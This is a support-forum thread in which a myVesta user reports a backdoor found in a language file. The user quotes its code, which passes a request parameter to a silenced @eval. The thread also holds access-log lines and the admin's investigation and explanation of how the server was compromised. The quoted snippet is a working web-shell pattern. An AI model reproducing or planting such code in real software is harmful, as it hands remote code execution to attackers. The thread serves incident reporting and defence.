BACKDOOR

Post Reply
danger321992
Posts: 2
Joined: Sun Aug 18, 2024 12:30 am

myVesta installed to clean debian 10 server by command:
wget http://c.myvestacp.com/vst-install-debian.sh
sudo bash vst-install-debian.sh
-------
My server have private IP, no any project (just clean server with installed vesta) and non-standart vesta port.
After ~10-15 hours somebody try access to vestacp file /inc/i18n/yi.php and have 404 error:
POST /inc/i18n/yi.php HTTP/1.1 "404" 1254 "-" "-" "-"
After 4 days sombody again access to /inc/i18n/yi.php with 200 OK
POST /inc/i18n/yi.php HTTP/1.1 "200" 110 "-" "-" "-"

When im checked this file, they have backdoor:

Code: Select all

$vcp_yi_fmt = $_REQUEST['vcp_yi_fmt'];
    set_error_handler(function($severity, $message, $file, $line) {
        return true;
    });
	set_exception_handler(function($exception) {
		return true;
	});
//...
'Licence Deactivated' => @eval($vcp_yi_fmt),
//...
Backdoor file have are same modify time like all other langs on /usr/local/vesta/web/inc/i18n/ (time install myvesta)

I want to know - how hackers found my server IP, they is private and don't have any public domains, 80/443 ports is hidden, only im know about installed vesta on this IP. And vesta have is non-standart port...
Where could this backdoor have come from?
Top
User avatar
myVesta
Site Admin
Posts: 964
Joined: Fri Jun 19, 2020 9:59 am
Has thanked: 10 times
Been thanked: 6 times

I will advise you to send to [email protected] these files:

Code: Select all

/var/log/vesta/nginx-access.log* (wildcard means: .1.log, .2.log.gz, etc... if exists)
/var/log/vesta/nginx-error.log*
/var/log/vesta/system.log*
/var/log/vesta/error.log*
/var/log/auth.log*
/var/log/syslog*
/root/.bash_history
Put these files in one .tar or .zip archive.

There is nothing suspicious on our 200 servers in our hosting company.
We just did a deep check on our 200 servers (last modification of files, grep for '@eval', also carefully checked our c.myvestacp.com and apt.myvestacp.com, modifications, md5 sums, last 30 root logins, etc... also checked again all github commits for last 4 months).

By the way, did you set "secret_url" for myVesta?
Top
danger321992
Posts: 2
Joined: Sun Aug 18, 2024 12:30 am

I sent my logs to email

I don't use secret url function
On vesta auth.log - only my logins from my ip, no any other.
Top
User avatar
myVesta
Site Admin
Posts: 964
Joined: Fri Jun 19, 2020 9:59 am
Has thanked: 10 times
Been thanked: 6 times

We forgot to reply here.
There is no evidence that our servers were compromised (otherwise, this topic would burn with new cases).
The user ran PHP cronjobs as an 'admin' user (which is a very bad idea), and we believe that the user's PHP scripts were compromised. The hacker then easily got high privileges via cron, via 'sudo admin ....'
Top
Post Reply

Return to “Bug report”